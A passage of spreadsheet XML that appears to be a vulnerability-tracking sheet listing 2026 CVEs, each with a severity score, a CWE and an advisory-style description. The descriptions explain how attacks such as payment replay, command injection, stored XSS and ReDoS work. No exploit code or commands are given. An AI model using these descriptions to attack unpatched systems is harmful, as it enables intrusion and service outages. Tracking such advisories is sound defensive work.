      <c r="G1188" s="5" t="inlineStr"/>
      <c r="H1188" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1188" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1188" s="5" t="inlineStr"/>
      <c r="K1188" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L1188" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in ZenHive mpp allows an unauthenticated remote client to obtain paid resources by resubmitting one settled on-chain transfer.
MPP.Methods.EVM.verify/2 accepts a transaction-hash credential and matches a transfer purely on token, to and amount (ERC-20) or to and value (native). It binds the proof neither to the challenge being verified nor to any record of prior use, and the generic MPP.Plug dedup store keys on challenge.id, which is regenerated for every 402 response. On a static-price route, a single historical transfer matching the charge therefore satisfies an unbounded number of later charges, including transfers an attacker can read off a public block explorer.
This issue affects mpp: from 0.3.0 before 0.6.3.</t>
        </is>
      </c>
      <c r="M1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67581</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68494</t>
        </is>
      </c>
      <c r="C1189" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1189" s="5" t="inlineStr"/>
      <c r="F1189" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1189" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H1189" s="5" t="inlineStr"/>
      <c r="I1189" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1189" s="5" t="inlineStr">
        <is>
          <t>The fix released in jackson-core 2.18.6 and 2.21.1 for CVE-2026-18401 (GHSA-72hv-8253-57qq, number length constraint bypass in the non-blocking parser) is incomplete. This record covers the remaining bypass.
The earlier fix wired validateIntegerLength() into a new _setIntLength() helper and invoked it wherever the integer portion of a number is decided: a terminator byte arrives, a '.' or 'e'/'E' is seen, or input ends inside a fully buffered value. It was not invoked on the attacker-relevant path where the parser runs out of input while still inside the MINOR_NUMBER_INTEGER_DIGITS minor state and returns NOT_AVAILABLE to the caller.
As a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, keeps the parser inside MINOR_NUMBER_INTEGER_DIGITS indefinitely. _textBuffer.expandCurrentSegment() grows the accumulator on every chunk while validateIntegerLength() is never called. The accumulator is bounded only by maxStringLength (20 MiB by default) rather than by maxNumberLength (1000 by default), an amplification of roughly 20,000x over the documented limit. Because Java char values occupy two bytes, a single connection can be driven to approximately 40 MiB of heap before the validator finally fires when the value completes.
The equivalent fraction-path code is correct: _finishFloatFraction() calls _setFractLength() before its NOT_AVAILABLE return. The missing call affects the integer-digit paths in _startPositiveNumber(), _startNegativeNumber() and _finishNumberIntegralPart() in NonBlockingUtf8JsonParserBase.
Impact: reactive frameworks such as Spring WebFlux/Reactor, Quarkus, Helidon and Vert.x feed inbound HTTP or gRPC bytes to the async parser as they arrive, which is precisely the chunked-feed shape required. Operators who set StreamReadConstraints.maxNumberLength expecting it to cap memory per number value do not get that guarantee; memory accumulates per concurrent connection and attacker-controlled concurrency can exhaust the JVM heap. The synchronous parsers (UTF8StreamJsonParser, ReaderBasedJsonParser) and the async parser operating on complete input are not affected.
Exploitation requires only the ability to stream data to a parsing endpoint; no privileges or user interaction are needed.
This issue affects com.fasterxml.jackson.core:jackson-core from version 2.15.0 through 2.18.7, and from 2.19.0 through 2.21.3, and tools.jackson.core:jackson-core from 3.0.0 through 3.1.3. Versions prior to 2.15.0 are not affected, because StreamReadConstraints -- which defines the maxNumberLength setting -- was first introduced in jackson-core 2.15.0, so no such constraint exists to be bypassed in earlier releases. Note that GHSA-r7wm-3cxj-wff9 states the affected 2.x range without a lower bound. The 2.22.x and 3.2.x release lines are not affected: those branches were created after the fix commit landed on 2026-05-21 and therefore contain it from their initial releases (2.22.0, tagged 2026-06-03, and 3.2.0, tagged 2026-06-08).</t>
        </is>
      </c>
      <c r="M1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68494</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68899</t>
        </is>
      </c>
      <c r="C1190" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1190" s="5" t="inlineStr"/>
      <c r="F1190" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1190" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1190" s="5" t="inlineStr"/>
      <c r="I1190" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1190" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.90, isFileValid() in models/fileValidation.js used the Unix file command for content-based MIME detection, but detectMimeFromFile() silently returned undefined when that binary was unavailable and the validation fell back to the attacker-controlled fileObj.type supplied through server/routes/attachmentApi.js. On deployments with WITH_API=true and no file binary, an authenticated board member could label HTML containing JavaScript as image/png, bypass the dangerous MIME check, and store active content under the Wekan origin for execution when another user opened it. Version 9.90 adds looksLikeDangerousMarkup() to inspect file bytes and force dangerous-content scanning when MIME detection is unavailable. This issue is fixed in version 9.90.</t>
        </is>
      </c>
      <c r="M1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68899</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69091</t>
        </is>
      </c>
      <c r="C1191" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1191" s="5" t="inlineStr"/>
      <c r="F1191" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1191" s="5" t="inlineStr"/>
      <c r="H1191" s="5" t="inlineStr"/>
      <c r="I1191" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 contains an authentication bypass vulnerability in the forum module when configured in login-only mode. The access control logic in modules/forum.php fails to validate the login-only configuration state, allowing unauthenticated attackers to read forum topics and posts by directly accessing the module with read-only parameters.</t>
        </is>
      </c>
      <c r="M1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69091</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69095</t>
        </is>
      </c>
      <c r="C1192" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1192" s="5" t="inlineStr"/>
      <c r="F1192" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1192" s="5" t="inlineStr"/>
      <c r="H1192" s="5" t="inlineStr"/>
      <c r="I1192" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1192" s="5" t="inlineStr">
        <is>
          <t>OpenWrt luci-app-bmx7 before commit 5890760a454dad2cb00389dba2cdc5e779e0ffdd contains a path traversal vulnerability in the bmx7-info CGI script that allows unauthenticated attackers to read files outside the configured runtimeDir. Attackers can supply directory traversal sequences in the query string to escape the intended directory and read sensitive files accessible to the CGI process.</t>
        </is>
      </c>
      <c r="M1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69095</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69096</t>
        </is>
      </c>
      <c r="C1193" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1193" s="5" t="inlineStr"/>
      <c r="F1193" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1193" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1193" s="5" t="inlineStr"/>
      <c r="I1193" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1193" s="5" t="inlineStr">
        <is>
          <t>OpenWrt luci-app-dockerman (LuCI master and openwrt-25.12 snapshots containing the ucode docker_rpc.uc RPC backend after the JS/ucode conversion) contains an OS command injection vulnerability. The package's read ACL grants broad ubus access to docker.* / docker.container.*, which exposes the docker.container.ttyd_start method even though it performs mutating operations. The run_ttyd handler builds a shell command from the request-controlled id, cmd, and uid fields and passes it to system() without quoting or argv-style execution in the rpcd root context. An authenticated attacker holding only the luci-app-dockerman read ACL can inject shell metacharacters (e.g., in id) to execute arbitrary commands as root via an HTTP POST to /ubus. openwrt-24.10 and openwrt-23.05 do not contain this backend and are not affected; no patched version was known as of the advisory.</t>
        </is>
      </c>
      <c r="M1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69096</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69220</t>
        </is>
      </c>
      <c r="C1194" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1194" s="5" t="inlineStr"/>
      <c r="F1194" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1194" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1194" s="5" t="inlineStr"/>
      <c r="I1194" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1194" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.1, src/main/java/com/rabbitmq/client/impl/ValueReader.java permits ValueReader.readTable and ValueReader.readArray to call ValueReader.readFieldValue recursively for AMQP table type F and AMQP array type A values without a nesting-depth limit. A malicious AMQP server or network intermediary can send approximately 580 nested table levels in the pre-authentication connection.start frame, fitting within the default 131072-byte frame maximum, to trigger StackOverflowError. The error terminates the client input processing thread and causes denial of service. This issue is fixed in version 5.33.1.</t>
        </is>
      </c>
      <c r="M1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69220</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6924</t>
        </is>
      </c>
      <c r="C1195" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1195" s="5" t="inlineStr"/>
      <c r="F1195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1195" s="5" t="inlineStr"/>
      <c r="H1195" s="5" t="inlineStr"/>
      <c r="I1195" s="5" t="inlineStr">
        <is>
          <t>2026-07-23</t>
        </is>
      </c>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr">
        <is>
          <t>CWE-336</t>
        </is>
      </c>
      <c r="L1195" s="5" t="inlineStr">
        <is>
          <t>A bug in the entropy initialization for SiWx917 causes the DRBG to use a predictable seed. As such, all random numbers generated in the Matter code use the same stream of numbers. This vulnerability was discovered after the impacted repository was already deprecated.</t>
        </is>
      </c>
      <c r="M1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6924</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69249</t>
        </is>
      </c>
      <c r="C1196" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1196" s="5" t="inlineStr"/>
      <c r="F1196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1196" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1196" s="5" t="inlineStr"/>
      <c r="I1196" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1196" s="5" t="inlineStr">
        <is>
          <t>python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In versions 42.0.0 through 48.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.</t>
        </is>
      </c>
      <c r="M1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69249</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69263</t>
        </is>
      </c>
      <c r="C1197" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1197" s="5" t="inlineStr"/>
      <c r="F1197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1197" s="5" t="inlineStr"/>
      <c r="H1197" s="5" t="inlineStr"/>
      <c r="I1197" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1197" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the mitigation for CVE-2025-8943 blocked -y and --yes flags on npx, but packages/components/nodes/tools/MCP/core.ts denied only PATH, LD_LIBRARY_PATH, DYLD_LIBRARY_PATH, and NODE_OPTIONS by exact environment-variable name. Because npm reads configuration from npm_config_* variables, setting npm_config_yes=true reproduced --yes behavior without using a blocked flag, causing npx to auto-install and execute the named package when a Custom MCP server launched. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69263</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70453</t>
        </is>
      </c>
      <c r="C1198" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1198" s="5" t="inlineStr"/>
      <c r="F1198" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1198" s="5" t="inlineStr"/>
      <c r="H1198" s="5" t="inlineStr"/>
      <c r="I1198" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1198" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains an algorithmic complexity vulnerability in the hash_search() function that allows a remote attacker to cause a denial of service by delivering a carefully constructed file list. A sender can exploit the quadratic-time worst-case behavior in hash lookups to exhaust receiver CPU resources with a modest number of crafted entries, causing a sustained denial of service.</t>
        </is>
      </c>
      <c r="M1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70453</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70464</t>
        </is>
      </c>
      <c r="C1199" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1199" s="5" t="inlineStr"/>
      <c r="F1199" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1199" s="5" t="inlineStr"/>
      <c r="H1199" s="5" t="inlineStr"/>
      <c r="I1199" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1199" s="5" t="inlineStr">
        <is>
          <t>rsync daemon 2.0.0 before 3.5.0 contains a denial of service vulnerability that allows unauthenticated remote attackers to exhaust daemon connection slots by stalling the handshake process before or after module selection without triggering the I/O timeout. Attackers can open many simultaneous connections and trickle data at the minimum rate to avoid timeout, or stall entirely before module selection where no timeout applies, consuming all available connection slots and denying service to legitimate clients.</t>
        </is>
      </c>
      <c r="M1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70464</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70492</t>
        </is>
      </c>
      <c r="C1200" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1200" s="5" t="inlineStr"/>
      <c r="F1200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1200" s="5" t="inlineStr"/>
      <c r="H1200" s="5" t="inlineStr"/>
      <c r="I1200" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1200" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.0, src/lib/components/chat/Messages/Markdown/KatexRenderer.svelte could store and render a chat message whose math block makes KaTeX fail with a stack overflow instead of a parse error. The catch branch fell back to inserting the original math source into the page as HTML through {@html} rather than as text, so script in the message runs in the browser of whoever views it, including shared chats and channels. The viewer's session token in localStorage can be stolen, and an administrator viewer can have their account taken over. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70492</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70619</t>
        </is>
      </c>
      <c r="C1201" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1201" s="5" t="inlineStr"/>
      <c r="F1201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1201" s="5" t="inlineStr"/>
      <c r="H1201" s="5" t="inlineStr"/>
      <c r="I1201" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1201" s="5" t="inlineStr"/>
      <c r="K1201" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1201" s="5" t="inlineStr">
        <is>
          <t>Odysseus before commit bf325f6 contains a missing authorization vulnerability that allows authenticated non-admin users to manage server-wide embedding backend configuration by invoking endpoint management routes that verify session authentication but omit the admin authorization guard. Attackers can supply an attacker-controlled URL to overwrite the embedding backend persisted in the endpoint configuration file and process environment, causing all subsequent embedding operations including chat messages, RAG queries, memory entries, and vault text to be transmitted in plaintext to the attacker-controlled destination, or delete the endpoint configuration to deny embedding service to all users.</t>
        </is>
      </c>
      <c r="M1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70619</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71190</t>
        </is>
      </c>
      <c r="C1202" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1202" s="5" t="inlineStr"/>
      <c r="F1202" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1202" s="5" t="inlineStr"/>
      <c r="H1202" s="5" t="inlineStr"/>
      <c r="I1202" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1202" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Swift through 2.38.0, the proxy server Accept header parser contains a regular expression vulnerable to catastrophic backtracking (ReDoS). The "qdtext" pattern (?:[^"]|\\.)* allows an unauthenticated remote attacker to send a crafted Accept header that causes exponential CPU consumption in the proxy worker. A payload of 32 backslash-character pairs exceeds 30 seconds of CPU time. No authentication is required. Repeated requests can exhaust all proxy worker threads, resulting in a complete denial of service.</t>
        </is>
      </c>
      <c r="M1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71190</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71404</t>
        </is>
      </c>
      <c r="C1203" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1203" s="5" t="inlineStr"/>
      <c r="F1203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1203" s="5" t="inlineStr"/>
      <c r="H1203" s="5" t="inlineStr"/>
      <c r="I1203" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1203" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. The GlobalRole controller derived the target ClusterRole name from the user-settable `authz.management.cattle.io/cr-name` annotation and overwrote that object's rules without verifying ownership. A user with delegated GlobalRole create or update permission could point the annotation at any existing ClusterRole, such as `cluster-admin`, and revoke the permissions of every principal bound to it. The change persists after the malicious GlobalRole is deleted.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="M1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71404</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71491</t>
        </is>
      </c>
      <c r="C1204" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1204" s="5" t="inlineStr"/>
      <c r="F1204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1204" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1204" s="5" t="inlineStr"/>
      <c r="I1204" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1204" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, group_comments in sqlparse/engine/grouping.py repeatedly rescans comment-only statements before the MAX_GROUPING_TOKENS guard, causing quadratic CPU consumption through sqlparse.parse() and sqlparse.format(sql, strip_comments=True). This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71491</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71961</t>
        </is>
      </c>
      <c r="C1205" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1205" s="5" t="inlineStr"/>
      <c r="F1205" s="5" t="n">
        <v>0.031</v>
      </c>
      <c r="G1205" s="5" t="inlineStr"/>
      <c r="H1205" s="5" t="inlineStr"/>
      <c r="I1205" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1205" s="5" t="inlineStr">
        <is>
          <t>Cudy WR3000 2.0 running firmware before 2.5.24 contains an OS command injection vulnerability that allows authenticated attackers to execute arbitrary OS commands with root privileges by sending unsanitized input through the mesh MQTT command interface. The sync_command binary forwards unsanitized input directly to a shell execution sink in command.lua, enabling attackers with access to the MQTT broker to exploit the default-enabled command execution path to achieve full root-level system compromise.</t>
        </is>
      </c>
      <c r="M1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71961</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71965</t>
        </is>
      </c>
      <c r="C1206" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1206" s="5" t="inlineStr"/>
      <c r="F1206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1206" s="5" t="inlineStr"/>
      <c r="H1206" s="5" t="inlineStr"/>
      <c r="I1206" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1206" s="5" t="inlineStr">
        <is>
